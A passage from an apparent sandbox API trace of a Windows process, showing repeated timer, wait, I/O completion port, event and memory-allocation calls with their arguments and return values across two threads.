timeEndPeriod (uPeriod=0x1) returned 0x0 [0083.013] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0083.572] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0083.572] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0083.607] timeEndPeriod (uPeriod=0x1) returned 0x0 [0083.607] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0083.870] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0083.870] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0083.906] timeEndPeriod (uPeriod=0x1) returned 0x0 [0083.912] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0084.216] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0084.216] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0084.224] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0084.240] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0084.240] SetEvent (hEvent=0x84) returned 1 [0084.240] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0084.242] SetEvent (hEvent=0x84) returned 1 [0084.242] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0084.250] SetEvent (hEvent=0x84) returned 1 [0084.250] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0084.255] timeEndPeriod (uPeriod=0x1) returned 0x0 [0084.255] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0084.266] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0084.266] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0084.266] SetEvent (hEvent=0x90) returned 1 [0084.266] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0084.275] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0084.275] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0084.322] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0084.322] SetEvent (hEvent=0xec) returned 1 [0084.322] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0084.336] timeEndPeriod (uPeriod=0x1) returned 0x0 [0084.336] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0113.130] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0113.131] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0113.131] SetEvent (hEvent=0xec) returned 1 [0113.131] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0113.136] timeEndPeriod (uPeriod=0x1) returned 0x0 [0113.136] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0118.040] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0118.040] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0118.040] SetEvent (hEvent=0xec) returned 1 [0118.040] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0118.051] timeEndPeriod (uPeriod=0x1) returned 0x0 [0118.051] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0123.300] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0123.300] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0123.300] SetEvent (hEvent=0xec) returned 1 [0123.301] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0123.316] timeEndPeriod (uPeriod=0x1) returned 0x0 [0123.316] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0127.736] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0127.736] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0127.736] SetEvent (hEvent=0xec) returned 1 [0127.736] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0127.749] timeEndPeriod (uPeriod=0x1) returned 0x0 [0127.749] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0130.210] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0130.210] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0130.210] SetEvent (hEvent=0xec) returned 1 [0130.210] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0130.226] timeEndPeriod (uPeriod=0x1) returned 0x0 [0130.226] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0136.183] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0136.183] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0136.183] SetEvent (hEvent=0xec) returned 1 [0136.183] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0136.208] timeEndPeriod (uPeriod=0x1) returned 0x0 [0136.208] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0145.689] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0145.689] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0145.689] SetEvent (hEvent=0xec) returned 1 [0145.689] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0145.706] timeEndPeriod (uPeriod=0x1) returned 0x0 [0145.706] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0149.675] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0149.675] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0149.675] SetEvent (hEvent=0xec) returned 1 [0149.675] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0149.682] timeEndPeriod (uPeriod=0x1) returned 0x0 [0149.682] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0154.562] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0154.563] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0154.563] SetEvent (hEvent=0xec) returned 1 [0154.563] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0154.596] timeEndPeriod (uPeriod=0x1) returned 0x0 [0154.596] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0158.866] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0158.866] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0158.866] SetEvent (hEvent=0xec) returned 1 [0158.866] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0158.876] timeEndPeriod (uPeriod=0x1) returned 0x0 [0158.876] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0162.761] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0162.761] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0162.761] SetEvent (hEvent=0xec) returned 1 [0162.761] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0162.782] timeEndPeriod (uPeriod=0x1) returned 0x0 [0162.782] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0166.174] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0166.174] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0166.174] SetEvent (hEvent=0xec) returned 1 [0166.174] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0166.179] timeEndPeriod (uPeriod=0x1) returned 0x0 [0166.179] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0170.578] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0170.578] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0170.578] SetEvent (hEvent=0xec) returned 1 [0170.578] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0170.602] timeEndPeriod (uPeriod=0x1) returned 0x0 [0170.602] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0172.433] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0172.433] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0172.433] SetEvent (hEvent=0xec) returned 1 [0172.433] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0172.465] timeEndPeriod (uPeriod=0x1) returned 0x0 [0172.465] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0173.839] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0173.839] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0173.839] SetEvent (hEvent=0xec) returned 1 [0173.839] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0173.846] timeEndPeriod (uPeriod=0x1) returned 0x0 [0173.846] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0178.213] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0178.213] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0178.214] SetEvent (hEvent=0xec) returned 1 [0178.214] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0178.499] timeEndPeriod (uPeriod=0x1) returned 0x0 [0178.499] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0181.208] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0181.208] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0181.208] SetEvent (hEvent=0xec) returned 1 [0181.208] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0181.216] timeEndPeriod (uPeriod=0x1) returned 0x0 [0181.216] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0184.736] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0184.736] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0184.736] SetEvent (hEvent=0xec) returned 1 [0184.736] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0184.747] timeEndPeriod (uPeriod=0x1) returned 0x0 [0184.747] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0186.193] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0186.193] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0186.193] SetEvent (hEvent=0xec) returned 1 [0186.193] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0186.226] timeEndPeriod (uPeriod=0x1) returned 0x0 [0186.226] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0187.519] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0187.519] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0187.519] SetEvent (hEvent=0xec) returned 1 [0187.519] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0187.527] timeEndPeriod (uPeriod=0x1) returned 0x0 [0187.527] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0188.990] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0188.990] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0188.990] SetEvent (hEvent=0xec) returned 1 [0188.990] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0189.022] timeEndPeriod (uPeriod=0x1) returned 0x0 [0189.022] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0190.334] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0190.334] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0190.334] SetEvent (hEvent=0xec) returned 1 [0190.334] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0190.347] timeEndPeriod (uPeriod=0x1) returned 0x0 [0190.349] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0191.459] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0191.459] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0191.459] SetEvent (hEvent=0xec) returned 1 [0191.459] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0191.496] timeEndPeriod (uPeriod=0x1) returned 0x0 [0191.496] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0194.519] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0194.519] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0194.519] SetEvent (hEvent=0xec) returned 1 [0194.519] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0194.555] timeEndPeriod (uPeriod=0x1) returned 0x0 [0194.555] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0195.877] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0195.877] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0195.877] SetEvent (hEvent=0xec) returned 1 [0195.877] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0195.882] timeEndPeriod (uPeriod=0x1) returned 0x0 [0195.882] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0197.287] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0197.287] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0197.287] SetEvent (hEvent=0xec) returned 1 [0197.287] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0197.330] timeEndPeriod (uPeriod=0x1) returned 0x0 [0197.331] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0198.614] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0198.614] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0198.614] SetEvent (hEvent=0xec) returned 1 [0198.614] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0198.628] timeEndPeriod (uPeriod=0x1) returned 0x0 [0198.628] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0199.553] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0199.553] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0199.553] SetEvent (hEvent=0xec) returned 1 [0199.553] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0199.579] timeEndPeriod (uPeriod=0x1) returned 0x0 [0199.579] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0201.436] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0201.436] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0201.437] SetEvent (hEvent=0xec) returned 1 [0201.437] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0201.454] timeEndPeriod (uPeriod=0x1) returned 0x0 [0201.455] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0202.217] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0202.217] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0202.217] SetEvent (hEvent=0xec) returned 1 [0202.218] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0202.222] timeEndPeriod (uPeriod=0x1) returned 0x0 [0202.222] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0202.250] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0202.250] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0202.250] SetEvent (hEvent=0xec) returned 1 [0202.250] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0202.262] timeEndPeriod (uPeriod=0x1) returned 0x0 [0202.262] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0202.976] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0202.976] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0202.976] SetEvent (hEvent=0xec) returned 1 [0202.976] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0203.096] timeEndPeriod (uPeriod=0x1) returned 0x0 [0203.096] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0203.379] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0203.379] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0203.379] SetEvent (hEvent=0xec) returned 1 [0203.379] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0203.446] timeEndPeriod (uPeriod=0x1) returned 0x0 [0203.446] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) Thread: id = 3 os_tid = 0xa28 [0053.678] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x27bcfea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x27bcfea0*=0x8c) returned 1 [0053.678] VirtualQuery (in: lpAddress=0x27bcfec0, lpBuffer=0x27bcfec0, dwLength=0x30 | out: lpBuffer=0x27bcfec0*(BaseAddress=0x27bcf000, AllocationBase=0x279d0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0053.678] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x790000 [0053.678] VirtualAlloc (lpAddress=0xc000080000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000080000 [0053.679] VirtualAlloc (lpAddress=0xc000082000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000082000 [0053.679] VirtualAlloc 